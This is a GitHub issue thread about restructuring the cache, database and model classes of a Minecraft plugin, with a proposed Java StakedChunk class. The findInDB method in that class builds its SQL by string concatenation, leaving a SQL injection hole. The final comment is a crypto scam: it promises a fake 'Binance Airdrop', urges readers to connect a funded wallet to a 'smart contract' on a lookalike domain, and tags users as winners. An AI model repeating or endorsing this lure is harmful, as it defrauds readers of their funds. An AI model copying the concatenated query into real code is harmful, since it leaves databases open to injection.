### ISSUE TITLE
Clean up and standardize cache, DB, and models

### ISSUE THREAD

**Issue by nenofite** [angushtlam/embarker#10]
Right now, the caching code is hard to follow and buggy. There's also some strange irregularities in the model classes (eg. what's the difference between creating a StakedChunk vs. finding one, setting the owner, then saving?) The encapsulation is such that the user of the model still needs to understand details of the model in DB, such as when to create a model, find then update a model, or delete a model--rather than only focusing on the state they are trying to persist.

I propose the following pattern, which will make working with models easier to reason about and hopefully we can eliminate some bugs/toil.

The model class has:

- no public constructor (instead use `get`, detailed below)
- `save()` which performs any updates to the model (such as setting the last updated timestamp) then calls the manager's `save(model)`
- `clear()` which takes place of delete. To delete a model, clear then save it.
- setters and getters for each **non-key** field

...and a nested `Manager` class (nested so it has access to the private constructor) which extends `CachedModel`, and has:

- `get(key...)` which retrieves from cache, else from DB, else constructs a model with that key
- `private save(model)` which is called by the model's `save` and includes the actual SQL to persist to cache and DB

Then in `Globals` we keep an instance of each model's manager class.

For example, the model class for StakedChunk would have:

```java
public class StakedChunk {

    private StakedChunk(int coordX, int coordZ, String worldName, String ownerUniqueId, Timestamp firstStaked, Timestamp lastUpdated, Manager manager) { ... }
   
    public static class Manager extends CachedModel<StakedChunk> {

        public StakedChunk get(int coordX, int coordZ, String worldName) {...}

        private void save(StakedChunk stakedChunk) {...}
    }

    public void save() {...}

    public void clear() {...}

    // getters and setters for ownerUniqueId, firstStaked, lastUpdated
}
```

**Comment by nenofite** [comment]
For example, to stake a chunk:

```java
Globals.stakedChunks.get(0, 0, "default")
  .setOwnerUniqueId("123-456")
  .save();
```

To unstake/delete a chunk:
```java
Globals.stakedChunks.get(0, 0, "default")
  .clear()
  .save();
```

**Comment by nenofite** [comment]
The manager class is the only place with SQL. This way, the model class focuses only on model behavior, not caching logic and SQL queries

**Comment by nenofite** [comment]
Here's a first pass at upgrading StakedChunk to follow this pattern. Hopefully it clarifies things

```java
package com.raeic.embarker.land.models;

import com.raeic.embarker.Globals;
import com.raeic.embarker.db.DB;
import com.raeic.embarker.utils.CachedModel;
import org.bukkit.Bukkit;

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.sql.Timestamp;

public class StakedChunk {
    /**
     * TOWN_CENTER_UID is stored as the owner unique ID in the chunk staked as town
     * center. It is not in UID format and will fail to parse as one.
     */
    public static final String TOWN_CENTER_UID = "town-center";

    // Key
    private final Manager manager;
    private final int coordX;
    private final int coordZ;
    private final String worldName;
    // Non-key
    private String ownerUniqueId;
    private Timestamp firstStaked;
    private Timestamp lastUpdated;

    private StakedChunk(int coordX, int coordZ, String worldName, String ownerUniqueId, Timestamp firstStaked,
            Timestamp lastUpdated, Manager manager) {
        this.manager = manager;
        this.coordX = coordX;
        this.coordZ = coordZ;
        this.worldName = worldName;
        this.ownerUniqueId = ownerUniqueId;
        this.firstStaked = firstStaked;
        this.lastUpdated = lastUpdated;
    }

    public int getCoordX() {
        return coordX;
    }

    public int getCoordZ() {
        return coordZ;
    }

    public String getWorldName() {
        return worldName;
    }

    public boolean isStaked() {
        return ownerUniqueId != null;
    }

    public void unstake() {
        ownerUniqueId = null;
    }

    public String getOwnerUniqueId() {
        if (isTownCenter()) {
            return null;
        } else {
            return ownerUniqueId;
        }
    }

    public void setOwnerUniqueId(String ownerUniqueId) {
        this.ownerUniqueId = ownerUniqueId;
    }

    public void setTownCenter() {
        this.ownerUniqueId = TOWN_CENTER_UID;
    }

    public boolean isTownCenter() {
        return TOWN_CENTER_UID.equals(ownerUniqueId);
    }

    public void setFirstStaked(Timestamp firstStaked) {
        this.firstStaked = firstStaked;
    }

    public void setLastUpdated(Timestamp lastUpdated) {
        this.lastUpdated = lastUpdated;
    }

    /**
     * delete is a synonym for unstaking the chunk then saving it, because unstaked
     * chunks are not stored in the database.
     */
    public void delete() {
        unstake();
        save();
    }

    /**
     * save stores the current state of this chunk in the database, overwriting
     * whatever is there. If the chunk is unstaked, it will be deleted from the
     * database.
     */
    public void save() {
        lastUpdated = new Timestamp(System.currentTimeMillis());
        if (isStaked() && firstStaked == null) {
            firstStaked = lastUpdated;
        }

        manager.save(this);
    }

    public static class Manager extends CachedModel<StakedChunk> {

        public StakedChunk get(int coordX, int coordZ, String worldName) {
            String stakedChunkCacheKey = key(coordX, coordZ, worldName);
            StakedChunk result = cache.get(stakedChunkCacheKey);
            if (result == null) {
                result = findInDB(coordX, coordZ, worldName);
            }
            if (result == null) {
                result = new StakedChunk(coordX, coordZ, worldName, null, null, null, this);
            }
            cache.put(stakedChunkCacheKey, result);
            return result;
        }

        private String key(int coordX, int coordZ, String worldName) {
            return coordX + "," + coordZ + "," + worldName;
        }

        private void save(StakedChunk stakedChunk) {
            if (stakedChunk.isStaked()) {
                replaceInDB(stakedChunk);
            } else {
                deleteFromDB(stakedChunk);
            }
        }

        private StakedChunk findInDB(int coordX, int coordZ, String worldName) {
            String sql = "select " + "  ownerUniqueId, firstStaked, lastUpdated " + "from embarkerstakedchunk "
                    + "where " + "  coordX = '" + coordX + "' " + "  and coordZ = '" + coordZ + "' "
                    + "  and worldName = '" + worldName + "' " + "limit 1";

            StakedChunk result = null;

            try {
                Connection conn = DB.getConnection();
                Statement statement = conn.createStatement();
                ResultSet results = statement.executeQuery(sql);

                if (results != null) {
                    // There should only be zero or one row.
                    while (results.next()) {
                        String ownerUniqueId = results.getString("ownerUniqueId");
                        Timestamp firstStaked = results.getTimestamp("firstStaked");
                        Timestamp lastUpdated = results.getTimestamp("lastUpdated");
                        result = new StakedChunk(coordX, coordZ, worldName, ownerUniqueId, firstStaked, lastUpdated,
                                this);
                    }

                    results.close();
                }
                statement.close();

            } catch (SQLException ex) {
                System.out.println(ex.getMessage());
                return null;
            }

            return result;
        }

        private void deleteFromDB(StakedChunk stakedChunk) {
            Bukkit.getScheduler().runTaskAsynchronously(Globals.plugin, () -> {
                String sql = "delete from embarkerstakedchunk where coordX = ? and coordZ = ? and worldName = ?";

                try {
                    Connection conn = DB.getConnection();
                    PreparedStatement values = conn.prepareStatement(sql);
                    values.setInt(1, stakedChunk.coordX);
                    values.setInt(2, stakedChunk.coordZ);
                    values.setString(3, stakedChunk.worldName);
                    values.executeUpdate();
                    values.closeOnCompletion();

                    // Invalidate caches because it's no longer accurate on write
                    Bukkit.getScheduler().runTask(Globals.plugin, () -> {
                        String key = key(stakedChunk.coordX, stakedChunk.coordZ, stakedChunk.worldName);
                        invalidateCacheByKey(key);
                    });
                } catch (SQLException ex) {
                    System.out.println(ex.getMessage());
                }
            });
        }

        private void replaceInDB(StakedChunk stakedChunk) {
            Bukkit.getScheduler().runTaskAsynchronously(Globals.plugin, () -> {
                String sql = "replace into embarkerstakedchunk(coordX, coordZ, worldName, ownerUniqueId) "
                        + "values(?, ?, ?, ?)";

                try {
                    Connection conn = DB.getConnection();
                    PreparedStatement values = conn.prepareStatement(sql);
                    values.setInt(1, stakedChunk.coordX);
                    values.setInt(2, stakedChunk.coordZ);
                    values.setString(3, stakedChunk.worldName);
                    values.setString(4, stakedChunk.ownerUniqueId);
                    values.executeUpdate();
                    values.closeOnCompletion();

                    // Invalidate caches because it's no longer accurate on write
                    Bukkit.getScheduler().runTask(Globals.plugin, () -> {
                        String key = key(stakedChunk.coordX, stakedChunk.coordZ, stakedChunk.worldName);
                        invalidateCacheByKey(key);
                    });
                } catch (SQLException ex) {
                    System.out.println(ex.getMessage());
                }
            });
        }
    }
}
```

**Comment by angushtlam** [comment]
i get it my code sucks

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @gokayokyay, @DanCarl857, @Gsllchb, @victorhermes, @kiku-jw, @blockbuilder97, @Huangtuzhi
